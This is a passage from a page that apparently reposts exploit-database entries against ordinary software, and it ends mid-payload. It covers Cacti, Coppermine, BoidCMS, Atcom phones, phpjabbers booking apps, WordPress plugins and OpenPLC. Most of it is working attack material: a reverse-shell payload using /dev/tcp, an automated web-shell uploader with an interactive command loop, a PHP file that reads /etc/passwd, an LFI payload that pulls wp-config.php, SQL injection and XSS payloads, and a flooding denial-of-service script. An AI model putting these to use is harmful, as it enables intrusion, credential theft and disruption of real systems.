Here is the response content:') print(response.text) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", required=True, help="URL of the target. example: http://192.168.1.1:9088/") parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin") parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin") args = parser.parse_args() minio = MyMinio(args.url, args.accesskey, args.secretkey) minio.poc()
  11. HireHackking

    Media Library Assistant Wordpress Plugin - RCE and LFI

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Media Library Assistant Wordpress Plugin - RCE and LFI # Date: 2023/09/05 # CVE: CVE-2023-4634 # Exploit Author: Florent MONTEL / Patrowl.io / @Pepitoh / Twitter @Pepito_oh # Exploitation path: https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/ # Exploit: https://github.com/Patrowl/CVE-2023-4634/ # Vendor Homepage: https://fr.wordpress.org/plugins/media-library-assistant/ # Software Link: https://fr.wordpress.org/plugins/media-library-assistant/ # Version: < 3.10 # Tested on: 3.09 # Description: # Media Library Assistant Wordpress Plugin in version < 3.10 is affected by an unauthenticated remote reference to Imagick() conversion which allows attacker to perform LFI and RCE depending on the Imagick configuration on the remote server. The affected page is: wp-content/plugins/media-library-assistant/includes/mla-stream-image.php #LFI Steps to trigger conversion of a remote SVG Create a remote FTP server at ftp://X.X.X.X:21 (http will not work, see references) Host 2 files : - malicious.svg - malicious.svg[1] Payload: For LFI, getting wp-config.php: Both malicious.svg and malicious.svg[1] on the remote FTP: <svg width="500" height="500" xmlns:xlink="http://www.w3.org/1999/xlink"> xmlns="http://www.w3.org/2000/svg"> <image xlink:href= "text:../../../../wp-config.php" width="500" height="500" /> </svg> Then trigger conversion with: http://127.0.0.1/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://X.X.X.X:21/malicious.svg&mla_debug=log&mla_stream_frame=1 # Directory listing or RCE: To achieve Directory listing or even RCE, it is a little more complicated. Use exploit available here: https://github.com/Patrowl/CVE-2023-4634/ # Note Exploitation will depend on the policy.xml Imagick configuration file installed on the remote server. All exploitation paths and scripts have been performed with a default wordpress configuration and installation (Wordpress has high chance to have the default Imagick configuration).
  12. HireHackking

    Cacti 1.2.24 - Authenticated command injection when using SNMP options

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Cacti 1.2.24 - Authenticated command injection when using SNMP options # Date: 2023-07-03 # Exploit Author: Antonio Francesco Sardella # Vendor Homepage: https://www.cacti.net/ # Software Link: https://www.cacti.net/info/downloads # Version: Cacti 1.2.24 # Tested on: Cacti 1.2.24 installed on 'php:7.4.33-apache' Docker container # CVE: CVE-2023-39362 # Category: WebApps # Original Security Advisory: https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp # Example Vulnerable Application: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application # Vulnerability discovered and reported by: Antonio Francesco Sardella ======================================================================================= Cacti 1.2.24 - Authenticated command injection when using SNMP options (CVE-2023-39362) ======================================================================================= ----------------- Executive Summary ----------------- In Cacti 1.2.24, under certain conditions, an authenticated privileged user, can use a malicious string in the SNMP options of a Device, performing command injection and obtaining remote code execution on the underlying server. ------- Exploit ------- Prerequisites: - The attacker is authenticated. - The privileges of the attacker allow to manage Devices and/or Graphs, e.g., "Sites/Devices/Data", "Graphs". - A Device that supports SNMP can be used. - Net-SNMP Graphs can be used. - snmp module of PHP is not installed. Example of an exploit: - Go to "Console" > "Create" > "New Device". - Create a Device that supports SNMP version 1 or 2. - Ensure that the Device has Graphs with one or more templates of: - "Net-SNMP - Combined SCSI Disk Bytes" - "Net-SNMP - Combined SCSI Disk I/O" - (Creating the Device from the template "Net-SNMP Device" will satisfy the Graphs prerequisite) - In the "SNMP Options", for the "SNMP Community String" field, use a value like this: public\' ; touch /tmp/m3ssap0 ; \' - Click the "Create" button. - Check under /tmp the presence of the created file. To obtain a reverse shell, a payload like the following can be used. public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \' A similar exploit can be used editing an existing Device, with the same prerequisites, and waiting for the poller to run. It could be necessary to change the content of the "Downed Device Detection" field under the "Availability/Reachability Options" section with an item that doesn't involve SNMP (because the malicious payload could break the interaction with the host). ---------- Root Cause ---------- A detailed root cause of the vulnerability is available in the original security advisory (https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp) or in my blog post (https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html). ---------- References ---------- - https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp - https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html - https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application
  13. HireHackking

    Wordpress Sonaar Music Plugin 4.7 - Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wordpress Sonaar Music Plugin 4.7 - Stored XSS # Date: 2023-09-05 # Exploit Author: Furkan Karaarslan # Category : Webapps # Vendor Homepage: http://127.0.0.1/wp/wordpress/wp-comments-post.php # Version: 4.7 (REQUIRED) # Tested on: Windows/Linux ---------------------------------------------------------------------------------------------------- 1-First install sonar music plugin. 2-Then come to the playlist add page. > http://127.0.0.1/wp/wordpress/wp-admin/edit.php?post_type=sr_playlist 3-Press the Add new playlist button 4-Put a random title on the page that opens and publish the page. > http://127.0.0.1/wp/wordpress/wp-admin/post-new.php?post_type=sr_playlist 5-This is the published page http://127.0.0.1/wp/wordpress/album_slug/test/ 6-Let's paste our xss payload in the comment section. Payload: <script>alert("XSS")</script> Bingoo Request: POST /wp/wordpress/wp-comments-post.php HTTP/1.1 Host: 127.0.0.1 Content-Length: 155 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://127.0.0.1/wp/wordpress/album_slug/test/ Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: comment_author_email_52c14530c1f3bbfa6d982f304802224a=a%40gmail.com; comment_author_52c14530c1f3bbfa6d982f304802224a=a%22%26gt%3Balert%28%29; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_52c14530c1f3bbfa6d982f304802224a=hunter%7C1694109284%7CXGnjFgcc7FpgQkJrAwUv1kG8XaQu3RixUDyZJoRSB1W%7C16e2e3964e42d9e56edd7ab7e45b676094d0b9e0ab7fcec2e84549772e438ba9; wp-settings-time-1=1693936486 Connection: close comment=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&submit=Yorum+g%C3%B6nder&comment_post_ID=13&comment_parent=0&_wp_unfiltered_html_comment=95f4bd9cf5
  14. HireHackking

    Coppermine Gallery 1.6.25 - RCE

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: coppermine-gallery 1.6.25 RCE Application: coppermine-gallery Version: v1.6.25 Bugs: RCE Technology: PHP Vendor URL: https://coppermine-gallery.net/ Software Link: https://github.com/coppermine-gallery/cpg1.6.x/archive/refs/tags/v1.6.25.zip Date of found: 05.09.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps 1.First of All create php file content as <?php echo system('cat /etc/passwd'); ?> and sequeze this file with zip. $ cat >> test.php <?php echo system('cat /etc/passwd'); ?> $ zip test.zip test.php 1. Login to account 2. Go to http://localhost/cpg1.6.x-1.6.25/pluginmgr.php 3. Upload zip file 4. Visit to php file http://localhost/cpg1.6.x-1.6.25/plugins/test.php poc request POST /cpg1.6.x-1.6.25/pluginmgr.php?op=upload HTTP/1.1 Host: localhost Content-Length: 630 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryi1AopwPnBYPdzorF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/cpg1.6.x-1.6.25/pluginmgr.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: cpg16x_data=YTo0OntzOjI6IklEIjtzOjMyOiI0MmE1Njk2NzhhOWE3YTU3ZTI2ZDgwYThlYjZkODQ4ZCI7czoyOiJhbSI7aToxO3M6NDoibGFuZyI7czo3OiJlbmdsaXNoIjtzOjM6ImxpdiI7YTowOnt9fQ%3D%3D; cpg16x_fav=YToxOntpOjA7aToxO30%3D; d4e0836e1827aa38008bc6feddf97eb4=93ffa260bd94973848c10e15e50b342c Connection: close ------WebKitFormBoundaryi1AopwPnBYPdzorF Content-Disposition: form-data; name="plugin"; filename="test.zip" Content-Type: application/zip PK �����b%Wz½µ}(���(�����test.phpUT �ñòödÓòödux���������<?php echo system('cat /etc/passwd');?> PK �����b%Wz½µ}(���(������������¤����test.phpUT�ñòödux���������PK������N���j����� ------WebKitFormBoundaryi1AopwPnBYPdzorF Content-Disposition: form-data; name="form_token" 50982f2e64a7bfa63dbd912a7fdb4e1e ------WebKitFormBoundaryi1AopwPnBYPdzorF Content-Disposition: form-data; name="timestamp" 1693905214 ------WebKitFormBoundaryi1AopwPnBYPdzorF--
  15. HireHackking

    Webedition CMS v2.9.8.8 - Blind SSRF

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Webedition CMS v2.9.8.8 - Blind SSRF Application: Webedition CMS Version: v2.9.8.8 Bugs: Blind SSRF Technology: PHP Vendor URL: https://www.webedition.org/ Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1 Date of found: 07.09.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== write https://youserver/test.xml to we_cmd[0] parameter poc request POST /webEdition/rpc.php?cmd=widgetGetRss&mod=rss HTTP/1.1 Host: localhost Content-Length: 141 sec-ch-ua: Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 sec-ch-ua-platform: "" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/webEdition/index.php?we_cmd[0]=startWE Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: treewidth_main=300; WESESSION=41a9164e60666254199b3ea1cd3d2e0ad969c379; cookie=yep; treewidth_main=300 Connection: close we_cmd[0]=https://YOU-SERVER/test.xml&we_cmd[1]=111000&we_cmd[2]=0&we_cmd[3]=110000&we_cmd[4]=&we_cmd[5]=m_3
  16. HireHackking

    BoidCMS v2.0.0 - authenticated file upload vulnerability

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/python3 # Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability # Date: 08/21/2023 # Exploit Author: 1337kid # Vendor Homepage: https://boidcms.github.io/#/ # Software Link: https://boidcms.github.io/BoidCMS.zip # Version: <= 2.0.0 # Tested on: Ubuntu # CVE : CVE-2023-38836 import requests import re import argparse parser = argparse.ArgumentParser(description='Exploit for CVE-2023-38836') parser.add_argument("-u", "--url", help="website url") parser.add_argument("-l", "--user", help="admin username") parser.add_argument("-p", "--passwd", help="admin password") args = parser.parse_args() base_url=args.url user=args.user passwd=args.passwd def showhelp(): print(parser.print_help()) exit() if base_url == None: showhelp() elif user == None: showhelp() elif passwd == None: showhelp() with requests.Session() as s: req=s.get(f'{base_url}/admin') token=re.findall('[a-z0-9]{64}',req.text) form_login_data={ "username":user, "password":passwd, "login":"Login", } form_login_data['token']=token s.post(f'{base_url}/admin',data=form_login_data) #=========== File upload to RCE req=s.get(f'{base_url}/admin?page=media') token=re.findall('[a-z0-9]{64}',req.text) form_upld_data={ "token":token, "upload":"Upload" } #==== php shell php_code=['GIF89a;\n','<?php system($_GET["cmd"]) ?>'] with open('shell.php','w') as f: f.writelines(php_code) #==== file = {'file' : open('shell.php','rb')} s.post(f'{base_url}/admin?page=media',files=file,data=form_upld_data) req=s.get(f'{base_url}/media/shell.php') if req.status_code == '404': print("Upload failed") exit() print(f'Shell uploaded to "{base_url}/media/shell.php"') while 1: cmd=input("cmd >> ") if cmd=='exit': exit() req=s.get(f'{base_url}/media/shell.php',params = {"cmd": cmd}) print(req.text)
  17. HireHackking

    Atcom 2.7.x.x - Authenticated Command Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Atcom 2.7.x.x - Authenticated Command Injection # Google Dork: N/A # Date: 07/09/2023 # Exploit Author: Mohammed Adel # Vendor Homepage: https://www.atcom.cn/ # Software Link: https://www.atcom.cn/html/yingwenban/Product/Fast_IP_phone/2017/1023/135.html # Version: All versions above 2.7.x.x # Tested on: Kali Linux Exploit Request: POST /cgi-bin/web_cgi_main.cgi?user_get_phone_ping HTTP/1.1 Host: {TARGET_IP} User-Agent: polar Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 49 Authorization: Digest username="admin", realm="IP Phone Web Configuration", nonce="value_here", uri="/cgi-bin/web_cgi_main.cgi?user_get_phone_ping", response="value_here", qop=auth, nc=value_here, cnonce="value_here" cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_ping Response: {"ping_cmd_result":"cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9saWdodHRwZC93d3cvY2dpLWJpbicK","ping_cmd":"0.0.0.0$(pwd)"} The value of "ping_cmd_result" is encoded as base64. Decoding the value of "ping_cmd_result" reveals the result of the command executed as shown below: ping: bad address '0.0.0.0/usr/local/app/lighttpd/www/cgi-bin'
  18. HireHackking

    Shuttle-Booking-Software v1.0 - Multiple-SQLi

    HireHackking posted a blog entry in Hacker Technology
    ## Title: Shuttle-Booking-Software v1.0 - Multiple-SQLi ## Author: nu11secur1ty ## Date: 09/10/2023 ## Vendor: https://www.phpjabbers.com/ ## Software: https://www.phpjabbers.com/shuttle-booking-software/#sectionPricing ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The location_id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the location_id parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. The attacker easily can steal all information from the database of this web application! WARNING! All of you: Be careful what you buy! This will be your responsibility! STATUS: HIGH-CRITICAL Vulnerability [+]Payload: ```mysql --- Parameter: location_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''') AND 1347=1347 AND ('MVss'='MVss&traveling=from Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''') AND GTID_SUBSET(CONCAT(0x716b786a71,(SELECT (ELT(9416=9416,1))),0x71706b7071),9416) AND ('dOqc'='dOqc&traveling=from Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: controller=pjFrontPublic&action=pjActionGetDropoffs&index=348&location_id=3''') AND (SELECT 1087 FROM (SELECT(SLEEP(15)))poqp) AND ('EEYQ'='EEYQ&traveling=from --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Shuttle-Booking-Software-1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/09/shuttle-booking-software-10-multiple.html) ## Time spent: 01:47:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
  19. HireHackking

    Limo Booking Software v1.0 - CORS

    HireHackking posted a blog entry in Hacker Technology
    ## Title: Limo Booking Software v1.0 - CORS ## Author: nu11secur1ty ## Date: 09/08/2023 ## Vendor: https://www.phpjabbers.com/ ## Software: https://www.phpjabbers.com/limo-booking-software/#sectionDemo ## Reference: https://portswigger.net/web-security/cors ## Description: The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain. The application allowed access from the requested origin http://wioydcbiourl.com Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks. The attacker can get some of the software resources of the victim without the victim knowing this. STATUS: HIGH Vulnerability [+]Test Payload: ``` GET /1694201352_198/index.php?controller=pjFrontPublic&action=pjActionFleets&locale=1&index=2795 HTTP/1.1 Host: demo.phpjabbers.com Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36 Connection: close Cache-Control: max-age=0 Origin: http://wioydcbiourl.com Referer: http://demo.phpjabbers.com/ Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Limo-Booking-Software-1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/09/limo-booking-software-10-cors.html) ## Time spent: 00:35:00
  20. HireHackking

    OpenPLC WebServer 3 - Denial of Service

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: OpenPLC WebServer 3 - Denial of Service # Date: 10.09.2023 # Exploit Author: Kai Feng # Vendor Homepage: https://autonomylogic.com/ # Software Link: https://github.com/thiagoralves/OpenPLC_v3.git # Version: Version 3 and 2 # Tested on: Ubuntu 20.04 import requests import sys import time import optparse import re parser = optparse.OptionParser() parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://target-uri:8080)") parser.add_option('-l', '--user', action="store", dest="user", help="User credential to login") parser.add_option('-p', '--passw', action="store", dest="passw", help="Pass credential to login") parser.add_option('-i', '--rip', action="store", dest="rip", help="IP for Reverse Connection") parser.add_option('-r', '--rport', action="store", dest="rport", help="Port for Reverse Connection") options, args = parser.parse_args() if not options.url: print('[+] Remote Code Execution on OpenPLC_v3 WebServer') print('[+] Specify an url target') print("[+] Example usage: exploit.py -u http://target-uri:8080 -l admin -p admin -i 192.168.1.54 -r 4444") exit() host = options.url login = options.url + '/login' upload_program = options.url + '/programs' compile_program = options.url + '/compile-program?file=681871.st' run_plc_server = options.url + '/start_plc' user = options.user password = options.passw rev_ip = options.rip rev_port = options.rport x = requests.Session() def auth(): print('[+] Remote Code Execution on OpenPLC_v3 WebServer') time.sleep(1) print('[+] Checking if host '+host+' is Up...') host_up = x.get(host) try: if host_up.status_code == 200: print('[+] Host Up! ...') except: print('[+] This host seems to be down :( ') sys.exit(0) print('[+] Trying to authenticate with credentials '+user+':'+password+'') time.sleep(1) submit = { 'username': user, 'password': password } x.post(login, data=submit) response = x.get(upload_program) if len(response.text) > 30000 and response.status_code == 200: print('[+] Login success!') time.sleep(1) else: print('[x] Login failed :(') sys.exit(0) def injection(): print('[+] PLC program uploading... ') upload_url = host + "/upload-program" upload_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvgPw.qwEcF3rMliGcTgQ4zI4RInBZrqE"} upload_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------210749863411176965311768214500", "Origin": host, "Connection": "close", "Referer": host + "/programs", "Upgrade-Insecure-Requests": "1"} upload_data = "-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"file\"; filename=\"program.st\"\r\nContent-Type: application/vnd.sailingtracker.track\r\n\r\nPROGRAM prog0\n VAR\n var_in : BOOL;\n var_out : BOOL;\n END_VAR\n\n var_out := var_in;\nEND_PROGRAM\n\n\nCONFIGURATION Config0\n\n RESOURCE Res0 ON PLC\n TASK Main(INTERVAL := T#50ms,PRIORITY := 0);\n PROGRAM Inst0 WITH Main : prog0;\n END_RESOURCE\nEND_CONFIGURATION\n\r\n-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nUpload Program\r\n-----------------------------210749863411176965311768214500--\r\n" upload = x.post(upload_url, headers=upload_headers, cookies=upload_cookies, data=upload_data) act_url = host + "/upload-program-action" act_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------374516738927889180582770224000", "Origin": host, "Connection": "close", "Referer": host + "/upload-program", "Upgrade-Insecure-Requests": "1"} act_data = "-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_name\"\r\n\r\nprogram.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_descr\"\r\n\r\n\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_file\"\r\n\r\n681871.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"epoch_time\"\r\n\r\n1617682656\r\n-----------------------------374516738927889180582770224000--\r\n" upload_act = x.post(act_url, headers=act_headers, data=act_data) time.sleep(2) def connection(): print('[+] add device...') inject_url = host + "/add-modbus-device" # inject_dash = host + "/dashboard" inject_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvyFA.2NQ7ZYcNZ74ci2miLkefHCai2Fk"} inject_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0", "Accept": "/text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------169043028319378579443281515639", "Origin": host, "Connection": "close", "Referer": host + "/add-modbus-device", "Upgrade-Insecure-Requests": "1"} inject_data = "-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_name\"\r\n\r\n122222222222222222222222222222222222211111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_protocol\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_id\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_ip\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_port\"\r\n\r\n#1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111